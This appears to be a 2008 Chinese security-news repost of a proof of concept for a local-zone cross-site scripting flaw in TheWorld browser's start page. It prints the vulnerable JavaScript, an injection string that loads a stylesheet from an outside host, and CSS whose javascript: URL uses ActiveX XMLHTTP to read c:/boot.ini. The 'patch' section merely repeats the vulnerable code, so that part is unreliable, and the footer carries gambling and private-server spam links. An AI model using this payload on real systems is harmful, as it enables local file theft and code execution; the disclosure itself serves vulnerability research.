岁月联盟 · 中国技术网 本站主页 | 安全认证 | 用户服务 | 技术论坛
新闻快报 | 新手学堂 | 黑客特区 | 程序语言 | 数 据 库 | 防 火 墙 | 路由交换 | 系统集成 | 服 务 器 | 存储备份 | 考试认证
Windows | Linux | Java | 协议分析 | 问题解答 | 进程大全 | 网页设计 | 多 媒 体 | 图库资料 | 软件下载 | 站内下载
  您现在的位置: 岁月联盟 >> 最新报道 >> 漏洞信息 >> 最新报道正文
世界之窗等浏览器本地xss跨域漏洞POC
作者:未知 文章来源:本站整理 点击数: 更新时间:2008-6-29 11:36:56

  漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html

  文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

  漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:

<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i]; 
str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’”+i+”‘);\”>” + “<img border=’0′ src=/news/UploadFiles_2795/200806/2008629113656830.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td ); 
str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>

  str_name和str_url不经过滤地直接输出,由于该页面处于本地安全区域,所以拥有很高的权限,可以做很多跨域操作,包括读取文件和运行本地程序。

  漏洞修补:

<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i]; 
str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’”+i+”‘);\”>” + “<img border=’0′ src=/news/UploadFiles_2795/200806/2008629113656830.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td ); 
str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>

  已经用js控制DOM显示了

  漏洞演示:这里提供测试方法可以读取c:/boot.ini

  1 打开如下地址

sc:h’><script>alert(document.write(unescape(”%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f%2fwww.80sec.com/1.css%22%3E”)))</script>

  2 上面将导致一个不可访问的页面,然后直接关闭tw浏览器( 没有好的办法crash)

  3 重新打开tw浏览器,可以发现http://www.80sec.com/1.css中的内容被解析,并且有本地域的权限。

  1.css内容,换成其他js代码一样执行

body {
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')
}

  漏洞状态:

  2008-06-24通知厂商

  2008-06-25修补

  http://www.ioage.com/cnnew/uplog.htm
  • 上一个最新报道:
  • 下一个最新报道:
    		•  
    热门文章
    推荐文章
    关于我们 | 发展历程 | 网站地图 | 广告服务 | 招贤纳士 | 战略合作 | 友情链接 | 著作声明 | 联系我们
    Copyright © 2002-2007 SYUE All rights reserved.
    E_mail:WebSyue@163.Com 皖ICP备05004589号
    未经授权禁止转载、摘编、复制或建立镜像.如有违反,追究法律责任.
    魔域私服 惊天动地私服 天龙八部私服 天龙八部私服 热血江湖私服 天龙八部私服 bet365 bet365 传世私服 传奇世界私服